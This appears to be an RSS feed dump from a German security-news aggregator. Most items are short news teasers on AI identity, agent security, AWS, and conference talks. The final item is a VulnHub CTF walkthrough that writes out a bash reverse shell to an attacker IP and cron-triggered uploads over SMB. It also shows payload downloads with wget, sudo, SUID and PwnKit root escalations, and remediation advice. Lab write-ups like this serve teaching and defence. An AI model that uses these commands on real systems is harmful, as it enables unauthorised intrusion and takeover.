<content:encoded><![CDATA[„Okta secures AI“. Unter diesem Motto fand letzte Woche die hiesige Ausgabe des Okta AI Identity Summit in Frankfurt am Main statt. Dort wollte ich vom SVP &amp; GM AI Security, Harish Peri, unter anderem wissen, was es mit diesem Claim genau auf sich hat. Und wo Harish Okta heute in einem Jahr sieht und … <p class="link-more"><a href="https://www.it-techblog.de/okta-ai-identity-summit-2026-das-bedeutet-okta-secure-ai/06/2026/" class="more-link">Mehr <span class="screen-reader-text">über "Okta AI Identity Summit 2026: Das bedeutet „Okta secure AI“" </span>Lesen</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Stop Your Legacy Infrastructure from Hijacking Your AI Agents]]></title>
<description><![CDATA[Earlier this month, I spoke at the Gartner Security & Risk Management Summit about a blind spot most security programs are still not accounting for - how attackers are circumventing AI security programs by using legacy infrastructure to hijack AI agents.

AI adoption is moving faster than securit...]]></description>
<link>https://tsecurity.de/de/3615451/it-security-nachrichten/stop-your-legacy-infrastructure-from-hijacking-your-ai-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615451/it-security-nachrichten/stop-your-legacy-infrastructure-from-hijacking-your-ai-agents/</guid>
<pubDate>Mon, 22 Jun 2026 14:38:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Earlier this month, I spoke at the Gartner Security &amp; Risk Management Summit about a blind spot most security programs are still not accounting for - how attackers are circumventing AI security programs by using legacy infrastructure to hijack AI agents.

AI adoption is moving faster than security programs can account for. Roughly 71% of organizations are piloting AI agents across their]]></content:encoded>
</item>
<item>
<title><![CDATA[Stop Your Legacy Infrastructure from Hijacking Your AI Agents]]></title>
<description><![CDATA[Earlier this month, I spoke at the Gartner Security & Risk Management Summit about a blind spot most security programs are still not accounting for – how attackers are circumventing AI security programs by using legacy infrastructure to hijack AI…
Read more →
The post Stop Your Legacy Infrastruct...]]></description>
<link>https://tsecurity.de/de/3615447/it-security-nachrichten/stop-your-legacy-infrastructure-from-hijacking-your-ai-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615447/it-security-nachrichten/stop-your-legacy-infrastructure-from-hijacking-your-ai-agents/</guid>
<pubDate>Mon, 22 Jun 2026 14:38:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Earlier this month, I spoke at the Gartner Security &amp; Risk Management Summit about a blind spot most security programs are still not accounting for – how attackers are circumventing AI security programs by using legacy infrastructure to hijack AI…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/stop-your-legacy-infrastructure-from-hijacking-your-ai-agents/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/stop-your-legacy-infrastructure-from-hijacking-your-ai-agents/">Stop Your Legacy Infrastructure from Hijacking Your AI Agents</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Early Edition: June 22, 2026]]></title>
<description><![CDATA[Signup to receive the Early Edition in your inbox here. A curated guide to major news and developments over the weekend. Here’s today’s news: IRAN WAR – LAKE LUCERNE SUMMIT The first round of high-level U.S.-Iran talks under the Islamabad Memorandum of Understanding concluded early Monday after m...]]></description>
<link>https://tsecurity.de/de/3615387/it-security-nachrichten/early-edition-june-22-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615387/it-security-nachrichten/early-edition-june-22-2026/</guid>
<pubDate>Mon, 22 Jun 2026 14:08:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Signup to receive the Early Edition in your inbox here. A curated guide to major news and developments over the weekend. Here’s today’s news: IRAN WAR – LAKE LUCERNE SUMMIT The first round of high-level U.S.-Iran talks under the Islamabad Memorandum of Understanding concluded early Monday after marathon weekend negotiations at Bürgenstock, with Qatar and Pakistan […]</p>
<p>The post <a href="https://www.justsecurity.org/143836/early-edition-june-22-2026/">Early Edition: June 22, 2026</a> appeared first on <a href="https://www.justsecurity.org/">Just Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Die stärkste Cyber-Abwehr 2026 ist keine Technologie – sondern das Team]]></title>
<description><![CDATA[KI-gestützte Angriffe überwinden selbst beste Firewalls. Was wirklich schützt: gut vorbereitete Menschen. Wie du Cyber-Resilienz zur Teamkompetenz machst, zeigt der Signal Security Summit am 18. November in Köln.
weiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3615379/it-nachrichten/die-staerkste-cyber-abwehr-2026-ist-keine-technologie-sondern-das-team/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615379/it-nachrichten/die-staerkste-cyber-abwehr-2026-ist-keine-technologie-sondern-das-team/</guid>
<pubDate>Mon, 22 Jun 2026 14:03:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[KI-gestützte Angriffe überwinden selbst beste Firewalls. Was wirklich schützt: gut vorbereitete Menschen. Wie du Cyber-Resilienz zur Teamkompetenz machst, zeigt der Signal Security Summit am 18. November in Köln.
<a href="https://t3n.de/news/cyber-resilienz-team-menschen-technologie-1745335/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Black Hat Europe 2025 | Offensive Testing Of HarmonyOS NEXT Applications With Harm0nyz3r & DVHA]]></title>
<description><![CDATA[Author: Black Hat - Bewertung: 1x - Views:28 HarmonyOS NEXT marks Huawei's transition to a fully independent operating system, powering a growing ecosystem of mobile devices and applications. While adoption is accelerating, public research into its security architecture, and its implications for ...]]></description>
<link>https://tsecurity.de/de/3613728/it-security-video/black-hat-europe-2025-offensive-testing-of-harmonyos-next-applications-with-harm0nyz3r-dvha/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3613728/it-security-video/black-hat-europe-2025-offensive-testing-of-harmonyos-next-applications-with-harm0nyz3r-dvha/</guid>
<pubDate>Sun, 21 Jun 2026 16:33:52 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Black Hat - Bewertung: 1x - Views:28 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/4xfSTNgy8UE?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>HarmonyOS NEXT marks Huawei's transition to a fully independent operating system, powering a growing ecosystem of mobile devices and applications. While adoption is accelerating, public research into its security architecture, and its implications for app developers and end users, remains minimal.<br />
<br />
This talk presents the results of a security assessment of HarmonyOS NEXT and its application ecosystem, combining a custom-built testing framework (Harm0nyz3r) with a purposely vulnerable application (Damn Vulnerable HarmonyOS Application – DVHA). Harm0nyz3r, inspired by Android security tools like Drozer, enables researchers to enumerate and interact with app IPC endpoints, fuzz abilities, and invoke hidden or restricted components. DVHA serves as a realistic playground, containing vulnerabilities such as insecure logging, hardcoded credentials, insecure data storage, SQL injection, command injection, and access control bypasses.<br />
<br />
We will walk through methodology, exploitation workflows, and real-world findings, including challenges posed by HarmonyOS NEXT's unique security model and differences from Android. Live demonstrations will show how Harm0nyz3r maps an application's attack surface, crafts malicious payloads, and successfully exploits vulnerabilities in DVHA — with clear takeaways for vulnerability discovery in production apps.<br />
Attendees will leave with a practical understanding of HarmonyOS NEXT app security, new offensive testing techniques for this emerging platform, and an appreciation of why mobile security research must expand beyond Android and iOS to address the next wave of global devices.<br />
<br />
By: Jorge Wallace  |  Cybersecurity Technical Leader, DEKRA<br />
<br />
https://blackhat.com/eu-25/briefings/schedule/?#breaking-the-harmony-offensive-testing-of-harmonyos-next-applications-with-harm0nyz3r--dvha-49334<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The DAO-Hack – Wie ein 50-Millionen-Dollar-Desaster die Krypto-We - Mares Media]]></title>
<description><![CDATA[Key Takeaways. The DAO sammelte 2016 in 28 Tagen über 168 Millionen Dollar ein, bevor ein Hacker durch eine Smart-Contract-Schwachstelle rund 50 ...]]></description>
<link>https://tsecurity.de/de/3613386/hacking/the-dao-hack-wie-ein-50-millionen-dollar-desaster-die-krypto-we-mares-media/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3613386/hacking/the-dao-hack-wie-ein-50-millionen-dollar-desaster-die-krypto-we-mares-media/</guid>
<pubDate>Sun, 21 Jun 2026 11:38:49 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Key Takeaways. The DAO sammelte 2016 in 28 Tagen über 168 Millionen Dollar ein, bevor ein <b>Hacker</b> durch eine Smart-Contract-Schwachstelle rund 50 ...]]></content:encoded>
</item>
<item>
<title><![CDATA[AWS says AI agents lack business context and security, launches two services to patch the gaps]]></title>
<description><![CDATA[At its summit in New York, AWS unveiled two new services. Continuum automatically detects, prioritizes, and fixes code vulnerabilities. Context builds a knowledge graph from corporate data to give AI agents the business context they need. Both tackle the same problem: agents that write code fast ...]]></description>
<link>https://tsecurity.de/de/3613310/ai-nachrichten/aws-says-ai-agents-lack-business-context-and-security-launches-two-services-to-patch-the-gaps/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3613310/ai-nachrichten/aws-says-ai-agents-lack-business-context-and-security-launches-two-services-to-patch-the-gaps/</guid>
<pubDate>Sun, 21 Jun 2026 10:33:53 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1456" height="816" src="https://the-decoder.com/wp-content/uploads/2024/12/aws_agents_midjourney.png" class="attachment-full size-full wp-post-image" alt="the AWS logo surrounded my millions of little AI agents connect to each other" decoding="async" fetchpriority="high"></p>
<p>        At its summit in New York, AWS unveiled two new services. Continuum automatically detects, prioritizes, and fixes code vulnerabilities. Context builds a knowledge graph from corporate data to give AI agents the business context they need. Both tackle the same problem: agents that write code fast but get things wrong too often.</p>
<p>The article <a href="https://the-decoder.com/aws-says-ai-agents-lack-business-context-and-security-launches-two-services-to-patch-the-gaps/">AWS says AI agents lack business context and security, launches two services to patch the gaps</a> appeared first on <a href="https://the-decoder.com/">The Decoder</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Can we electrify the world? Ambition takes centre stage in pre-Cop31 climate talks]]></title>
<description><![CDATA[Apart from effort to electrify, there were geopolitical tensions around climate science and the 1.5C goalElectrifying the world – with electric vehicles, electric heating and cooling, and modernised heavy industry – could be the next biggest step towards phasing out fossil fuels, replacing the 80...]]></description>
<link>https://tsecurity.de/de/3611781/it-nachrichten/can-we-electrify-the-world-ambition-takes-centre-stage-in-pre-cop31-climate-talks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3611781/it-nachrichten/can-we-electrify-the-world-ambition-takes-centre-stage-in-pre-cop31-climate-talks/</guid>
<pubDate>Sat, 20 Jun 2026 08:33:25 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Apart from effort to electrify, there were geopolitical tensions around climate science and the 1.5C goal</p><p>Electrifying the world – with <a href="https://www.theguardian.com/future-labs-moonshot-2030/2024/oct/30/episode-three-our-transportation-is-on-the-brink-of-going-fully-electric">electric vehicles</a>, electric heating and cooling, and modernised heavy industry – could be the next biggest step towards phasing out fossil fuels, replacing the 80% of global energy that still comes from hydrocarbons. As using electrical energy is much more efficient than combustion, the move would save billions of dollars for consumers and businesses – global energy demand could be halved, according to one estimate.</p><p>For decades, electrification has been a nerdish backwater of global climate action. But in the last two weeks, at preparatory talks in Bonn before the forthcoming <a href="https://www.theguardian.com/environment/cop31">UN Cop31 climate summit</a>, the subject finally took centre stage.</p> <a href="https://www.theguardian.com/environment/2026/jun/20/electrification-takes-centre-stage-bonn-climate-talks">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Inside the Mind of Anthropic CEO Dario Amodei | The Circuit | Extended Interview]]></title>
<description><![CDATA[Author: Bloomberg Originals - Bewertung: 6380x - Views:242460 Emily Chang sits down with Anthropic CEO Dario Amodei in a wide-ranging interview discussing his San Francisco roots, the race against OpenAI, the Pentagon standoff and AI’s endgame.

Watch Inside Anthropic, the $965 Billion AI Juggern...]]></description>
<link>https://tsecurity.de/de/3611570/it-security-nachrichten/inside-the-mind-of-anthropic-ceo-dario-amodei-the-circuit-extended-interview/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3611570/it-security-nachrichten/inside-the-mind-of-anthropic-ceo-dario-amodei-the-circuit-extended-interview/</guid>
<pubDate>Sat, 20 Jun 2026 04:54:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Bloomberg Originals - Bewertung: 6380x - Views:242460 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/x2VHFgyawPE?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Emily Chang sits down with Anthropic CEO Dario Amodei in a wide-ranging interview discussing his San Francisco roots, the race against OpenAI, the Pentagon standoff and AI’s endgame.<br />
<br />
Watch Inside Anthropic, the $965 Billion AI Juggernaut: https://youtu.be/v1wZwxY3CMg<br />
<br />
00:00 Inside Anthropic <br />
03:34 Dario background <br />
05:51 Leaving OpenAI <br />
07:42 India AI summit <br />
10:45 Enterprise bet <br />
17:22: Big tech funding  <br />
19:29 Compute crunch<br />
21:15 Surpassing OpenAI <br />
24:07 Product velocity <br />
24:52 AI discoveries <br />
26:13 Dario’s writing style <br />
28:10 AI and the workforce <br />
36:41 Pentagon standoff <br />
43:29 AI warfare <br />
48:18 Mythos <br />
55:15 Nationalizing AI <br />
58:57 Visit to the White House <br />
59:47 China <br />
1:03:24 Recursive self-improvement <br />
1:05:07 Dario’s favorite book <br />
1:05:49 Civilization collapse <br />
1:07:32 Trust <br />
<br />
Watch more of The Circuit with Emily Chang: https://www.youtube.com/show/VLPLqq4LnWs3olV2nw7GgFjXHvxVc3T5hXXT?sbp=QAE%3D<br />
<br />
Hosted by high-profile journalist Emily Chang, The Circuit is a fast-paced, dynamic series that lives at the intersection of culture, tech, entertainment, and business. Every week, Chang will go on location to meet the world’s most fascinating founders, influencers, and innovators, conducting intimate interviews and bringing audiences behind the scenes of the most impactful stories, launches, and trends.<br />
<br />
#anthropic #AI #DarioAmodei #tech #business <br />
--------<br />
Like this video? Subscribe: http://www.youtube.com/Bloomberg?sub_confirmation=1<br />
<br />
Get unlimited access to Bloomberg.com for just $1.99 your first month: https://www.bloomberg.com/subscriptions?in_source=YoutubeOriginals<br />
Bloomberg Originals offers bold takes for curious minds on today’s biggest topics. Hosted by experts covering stories you haven’t seen and viewpoints you haven’t heard, you’ll discover cinematic, data-led shows that investigate the intersection of business and culture. Exploring every angle of climate change, technology, finance, sports and beyond, Bloomberg Originals is business as you’ve never seen it. <br />
<br />
Subscribe for business news, but not as you've known it: exclusive interviews, fascinating profiles, data-driven analysis, and the latest in tech innovation from around the world.<br />
<br />
Visit our partner channel Bloomberg News for global news and insight in an instant.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[$] Suspending and resuming BPF programs]]></title>
<description><![CDATA[BPF programs can be used to extend many aspects the Linux kernel, but
BPF programs must run to completion in the same context that they began.
Kumar Kartikeya Dwivedi is working on changing that by
allowing BPF programs to be expressed as coroutines. He spoke about his work at
the 2026

Linux Sto...]]></description>
<link>https://tsecurity.de/de/3610886/linux-tipps/suspending-and-resuming-bpf-programs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610886/linux-tipps/suspending-and-resuming-bpf-programs/</guid>
<pubDate>Fri, 19 Jun 2026 18:12:52 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>
BPF programs can be used to extend many aspects the Linux kernel, but
BPF programs must run to completion in the same context that they began.
Kumar Kartikeya Dwivedi is working on changing that by
allowing BPF programs to be expressed as coroutines. He spoke about his work at
the 2026
<a href="https://events.linuxfoundation.org/lsfmmbpf/">
Linux Storage, Filesystem, Memory-Management and BPF Summit</a>. While
still experimental, the change promises to make long-running BPF tasks
significantly easier to write.
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[VulnHub — sunset: dawn | Full Walkthrough]]></title>
<description><![CDATA[Author: Shikhali Jamalzade GitHub: github.com/alisalive LinkedIn: linkedin.com/in/camalzads Platform: VulnHub Machine: sunset: dawn by @whitecr0wz Difficulty: Beginner–Intermediate | OS: Debian GNU/Linux 10 (Buster)Overviewsunset: dawn is a beginner-to-intermediate VulnHub machine and the second ...]]></description>
<link>https://tsecurity.de/de/3610158/hacking/vulnhub-sunset-dawn-full-walkthrough/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610158/hacking/vulnhub-sunset-dawn-full-walkthrough/</guid>
<pubDate>Fri, 19 Jun 2026 13:09:29 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*DmUHvH2bRCpfgOTUO1ojqQ.png"></figure><p><strong>Author:</strong> <a href="https://medium.com/u/20557ba7487d">Shikhali Jamalzade</a> <br><strong>GitHub:</strong> <a href="http://github.com/alisalive">github.com/alisalive</a> <br><strong>LinkedIn:</strong> <a href="http://linkedin.com/in/camalzads">linkedin.com/in/camalzads</a> <br><strong>Platform:</strong> <a href="http://vulnhub.com/">VulnHub</a> <br><strong>Machine:</strong> <a href="https://www.vulnhub.com/entry/sunset-dawn,341/">sunset: dawn</a> by @whitecr0wz <br><strong>Difficulty:</strong> Beginner–Intermediate | <strong>OS:</strong> Debian GNU/Linux 10 (Buster)</p><h3>Overview</h3><p>sunset: dawn is a beginner-to-intermediate VulnHub machine and the second entry in the sunset series by @whitecr0wz. The attack path begins with SMB enumeration that reveals a writable share mapped directly to a directory executed by a root-owned cron job — uploading a reverse shell script there is enough to land a www-data shell. Post-exploitation enumeration with LinPEAS then uncovers four independent privilege escalation paths, each sufficient on its own to reach root. This machine is an excellent exercise in SMB misconfigurations, cron-based exploitation, and Linux post-exploitation methodology.</p><p><strong>Flag captured:</strong></p><ul><li>flag.txt → /root/flag.txt</li></ul><h3>Environment</h3><p>Parameter Value Target IP 192.168.100.198 Attacker IP 192.168.100.199 (Kali Linux) Test Type Black Box Hostname dawn</p><h3>Reconnaissance</h3><h3>Network Scan — Nmap</h3><p>Full-port aggressive scan to enumerate all open services:</p><pre>nmap -p- -sV -sC 192.168.100.198</pre><p><strong>Results:</strong></p><pre>PORT     STATE SERVICE     VERSION<br>80/tcp   open  http        Apache httpd 2.4.38 ((Debian))<br>139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)<br>445/tcp  open  microsoft-ds Samba smbd 4.9.5-Debian<br>3306/tcp open  mysql       MySQL 5.5.5-10.3.18-MariaDB-0+deb10u1</pre><pre>Host script results:<br>| smb-os-discovery:<br>|   OS: Windows 6.1 (Samba 4.9.5-Debian)<br>|   Computer name: dawn<br>|   NetBIOS computer name: DAWN<br>|_  Domain name: dawn</pre><p><strong>Key observations:</strong></p><ul><li><strong>Port 80</strong> — Apache 2.4.38: web server present, but browsing to it yields no useful content</li><li><strong>Port 139/445</strong> — Samba SMB: the most interesting attack surface given no web application</li><li><strong>Port 3306</strong> — MariaDB: MySQL listening, but almost certainly bound to localhost only</li></ul><p>With the web server returning nothing useful, SMB becomes the primary focus.</p><h3>Web Enumeration — Gobuster</h3><p>Even though the web server returned no meaningful content at the root, I ran a directory scan in parallel:</p><pre>gobuster dir -u http://192.168.100.198 \<br>  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \<br>  -x php,txt,html</pre><p><strong>Results:</strong></p><pre>/logs   (Status: 301)</pre><p>Browsing to /logs/ revealed a file: management.log. This log turned out to be critical — it recorded cron job activity on the system, showing automated execution of scripts inside a directory called ITDEPT:</p><pre>Executing /home/dawn/ITDEPT/product-control<br>Executing /home/dawn/ITDEPT/web-control<br>chmod +x /home/dawn/ITDEPT/product-control<br>chmod +x /home/dawn/ITDEPT/web-control<br>sh /home/dawn/ITDEPT/product-control<br>sh /home/dawn/ITDEPT/web-control</pre><p>The system was automatically making files executable and running them every minute. The name ITDEPT matched exactly what I was about to find in the SMB shares.</p><h3>SMB Enumeration — enum4linux</h3><pre>enum4linux -a 192.168.100.198</pre><p><strong>Results:</strong></p><pre>Sharename    Type    Comment<br>---------    ----    -------<br>print$       Disk    Printer Drivers<br>ITDEPT       Disk    PLEASE DO NOT REMOVE THIS SHARE.<br>                     IN CASE YOU ARE NOT AUTHORIZED TO USE<br>                     THIS SYSTEM LEAVE IMMEDIATELY.<br>IPC$         IPC     IPC Service (Samba 4.9.5-Debian)</pre><pre>[+] Users found via RID cycling:<br>    dawn<br>    ganimedes</pre><p>Two findings that matter:</p><ul><li>The ITDEPT share exists and carries a warning message — a clear sign it is actively monitored or executed</li><li>Two system users identified: <strong>dawn</strong> and <strong>ganimedes</strong></li></ul><p>I verified access permissions with smbmap:</p><pre>smbmap -H 192.168.100.198</pre><pre>ITDEPT    READ, WRITE    PLEASE DO NOT REMOVE THIS SHARE...</pre><p><strong>READ and WRITE access — no authentication required.</strong> Combined with what management.log already told me — that the system executes scripts from this exact directory every minute — the attack path was clear.</p><h3>Initial Access — SMB Write + Cron Execution → Reverse Shell</h3><p>Detail Value Vector SMB writable share + root cron job Shell obtained www-data Severity <strong>Critical</strong></p><p>The cron job runs sh /home/dawn/ITDEPT/web-control every minute. The ITDEPT SMB share maps directly to /home/dawn/ITDEPT/. Anyone who can write to the share can write to that path — and the cron will execute whatever they put there as the service account.</p><p><strong>Step 1 — Create the reverse shell script locally:</strong></p><pre>cat &gt; web-control &lt;&lt; 'EOF'<br>#!/bin/bash<br>bash -i &gt;&amp; /dev/tcp/192.168.100.199/4444 0&gt;&amp;1<br>EOF</pre><p><strong>Step 2 — Start a listener on Kali:</strong></p><pre>nc -lvnp 4444</pre><p><strong>Step 3 — Upload the script to the ITDEPT share:</strong></p><pre>smbclient //192.168.100.198/ITDEPT -N<br>smb: \&gt; put web-control<br>putting file web-control as \web-control (6.8 kb/s)<br>smb: \&gt; exit</pre><p><strong>Step 4 — Wait for the cron to fire (up to 60 seconds):</strong></p><pre>Connection received on 192.168.100.198 54321<br>www-data@dawn:/home/dawn/ITDEPT$</pre><p>Shell obtained as www-data. I stabilised it immediately:</p><pre>python3 -c 'import pty; pty.spawn("/bin/bash")'<br># Ctrl+Z<br>stty raw -echo; fg<br>export TERM=xterm</pre><h3>Post-Exploitation Enumeration — LinPEAS</h3><p>With a stable shell, I transferred LinPEAS to the target using a Python HTTP server:</p><p><strong>On Kali:</strong></p><pre>cd /usr/share/peass/linpeas<br>python3 -m http.server 80</pre><p><strong>On the target:</strong></p><pre>cd /tmp<br>wget http://192.168.100.199/linpeas.sh<br>chmod +x linpeas.sh<br>./linpeas.sh</pre><p>LinPEAS immediately flagged four high-severity findings — each one a standalone path to root.</p><h3>Privilege Escalation</h3><h3>Vector 1 — Sudo Misconfiguration</h3><p>Detail Value Finding www-data can run /usr/bin/sudo as root with no password Severity <strong>Critical</strong></p><p>LinPEAS output:</p><pre>User www-data may run the following commands on dawn:<br>    (root) NOPASSWD: /usr/bin/sudo</pre><p>This configuration allows www-data to run the sudo binary itself as root — without any password. Invoking sudo from inside sudo spawns a second privileged process that drops directly into a root shell.</p><p><strong>Exploitation:</strong></p><pre>www-data@dawn:/tmp$ sudo sudo /bin/bash<br>root@dawn:/tmp# id<br>uid=0(root) gid=0(root) groups=0(root)</pre><p>One command. Full root.</p><p><strong>Remediation:</strong></p><p>Edit /etc/sudoers and remove the www-data entry entirely. If www-data genuinely needs elevated access for a specific task, scope it to the minimum required binary — never to sudo itself:</p><pre># Remove this line:<br>www-data ALL=(root) NOPASSWD: /usr/bin/sudo</pre><h3>Vector 2 — SUID Binary (zsh)</h3><p>Detail Value Finding /usr/bin/zsh has the SUID bit set, owned by root Severity <strong>Critical</strong></p><p>LinPEAS output:</p><pre>-rwsr-xr-x 1 root root 842K Feb 4 2019 /usr/bin/zsh</pre><p>When the SUID bit is set on a binary, the process runs with the file owner’s privileges regardless of who launches it. Since zsh is a fully functional interactive shell owned by root, executing it directly spawns a root shell.</p><p><strong>Exploitation:</strong></p><pre>www-data@dawn:/tmp$ /usr/bin/zsh<br>dawn# whoami<br>root<br>dawn# id<br>uid=0(root) gid=0(root) groups=0(root)</pre><p><strong>Remediation:</strong></p><p>Remove the SUID bit from zsh immediately:</p><pre>chmod u-s /usr/bin/zsh</pre><pre># Verify:<br>ls -la /usr/bin/zsh<br>-rwxr-xr-x 1 root root 842K /usr/bin/zsh</pre><p>Interactive shells (bash, zsh, sh, dash) must never carry the SUID bit. Audit all SUID binaries regularly:</p><pre>find / -perm -4000 -type f 2&gt;/dev/null</pre><h3>Vector 3 — Writable Cron Script</h3><p>Detail Value Finding Root cron executes a script world-writable by www-data Severity <strong>High</strong></p><p>LinPEAS identified two things in combination:</p><p><strong>Finding 1 — root crontab:</strong></p><pre>* * * * * /home/dawn/ITDEPT/web-control</pre><p><strong>Finding 2 — permissions on that script:</strong></p><pre>-rwxrwxrwx 1 dawn dawn /home/dawn/ITDEPT/web-control</pre><p>The script is world-writable. Root executes it every minute. Any user who can write to this file can inject arbitrary commands that root will run.</p><p><strong>Exploitation:</strong></p><pre># Inject a SUID bash copy into the script<br>echo 'cp /bin/bash /tmp/rootbash &amp;&amp; chmod +s /tmp/rootbash' &gt;&gt; \<br>  /home/dawn/ITDEPT/web-control</pre><pre># Wait up to 60 seconds for the cron to fire, then:<br>/tmp/rootbash -p</pre><pre>rootbash-5.0# whoami<br>root<br>rootbash-5.0# id<br>uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root)</pre><p><strong>Remediation:</strong></p><pre>chmod 700 /home/dawn/ITDEPT/web-control<br>chown root:root /home/dawn/ITDEPT/web-control</pre><p>Any script executed by a root cron job must be owned by root and writable only by root. Audit cron scripts regularly:</p><pre>find /etc/cron* /var/spool/cron -type f | xargs ls -la</pre><h3>Vector 4 — PwnKit (CVE-2021–4034)</h3><p>Detail Value CVE CVE-2021–4034 CVSS 7.8 (High) Component pkexec (Polkit) Vulnerable version pkexec 0.105 Exploit source github.com/ly4k/PwnKit Severity <strong>Critical</strong></p><p>LinPEAS flagged this in its Exploit Suggester output:</p><pre>[+] [CVE-2021-4034] PwnKit<br>    Tags: [ debian=7|8|9|10|11 ]<br>    Exposure: probable</pre><p>PwnKit is a heap-based memory corruption vulnerability in pkexec — the PolicyKit binary present on virtually every Linux distribution. The flaw has existed since 2009 and was disclosed by Qualys Research Team in January 2022. It allows any unprivileged local user to escalate to root.</p><p>The pkexec binary on this system was confirmed vulnerable:</p><pre>-rwsr-xr-x 1 root root 23288 Jan 15 2019 /usr/bin/pkexec</pre><p><strong>Exploitation:</strong></p><p>On Kali, I downloaded the pre-compiled binary from ly4k/PwnKit and served it via HTTP:</p><pre>wget https://github.com/ly4k/PwnKit/raw/main/PwnKit<br>python3 -m http.server 80</pre><blockquote><strong><em>Note:</em></strong><em> The first attempt using berdav/CVE-2021–4034 failed with a </em><em>GLIBC_2.34 version mismatch. The </em><em>ly4k/PwnKit pre-compiled binary targets older GLIBC versions and is the correct choice for Debian 10.</em></blockquote><p>On the target:</p><pre>cd /tmp<br>wget http://192.168.100.199/PwnKit<br>chmod +x PwnKit<br>./PwnKit</pre><pre>root@dawn:/tmp# whoami<br>root<br>root@dawn:/tmp# id<br>uid=0(root) gid=0(root) groups=0(root),33(www-data)</pre><p><strong>Remediation:</strong></p><pre># Update polkit immediately:<br>sudo apt update &amp;&amp; sudo apt upgrade policykit-1</pre><pre># If updating is not immediately possible, remove the SUID bit as a temporary measure<br># (note: this may break some GUI authentication prompts):<br>chmod 0755 /usr/bin/pkexec</pre><p>The patched version for Debian 10 is policykit-1 0.105-26+deb10u1 or later.</p><h3>Root Flag</h3><pre>root@dawn:~# cat /root/flag.txt</pre><pre>Hello! whitecr0wz here. I hope you enjoyed this box, if you<br>did please let me know at Twitter @whitecr0wz!</pre><pre>flag{3a3e52f0a6af0d6e36d7c5027c87f6e1}</pre><h3>Full Attack Chain</h3><pre>[Kali — 192.168.100.199]<br>         |<br>         | nmap -p- -sV -sC<br>         ↓<br>[dawn — 192.168.100.198]<br>  Port 80  → Apache 2.4.38 (no content)<br>  Port 445 → Samba (ITDEPT share)<br>         |<br>         | gobuster → /logs/management.log<br>         ↓<br>  Log reveals: cron executes ITDEPT/web-control every minute<br>         |<br>         | enum4linux → ITDEPT share: READ + WRITE (no auth)<br>         ↓<br>  Upload reverse shell as web-control → cron fires → www-data shell<br>         |<br>         | wget linpeas.sh → ./linpeas.sh<br>         ↓<br>  4 privesc vectors found:<br>    [1] sudo sudo /bin/bash           → root (1 command)<br>    [2] /usr/bin/zsh (SUID)           → root (1 command)<br>    [3] echo into web-control cron    → root (wait 60s)<br>    [4] ./PwnKit (CVE-2021-4034)      → root (1 command)<br>         |<br>         ↓<br>  ROOT — uid=0 — FULL COMPROMISE ✓</pre><h3>Key Takeaways</h3><p><strong>Reading logs before attacking:</strong> The /logs/management.log file told me exactly what the system was doing before I sent a single offensive request. Logs, readme files, and error messages often contain more actionable intelligence than any scanner output. Always enumerate web content thoroughly even when the homepage appears empty.</p><p><strong>The SMB + cron 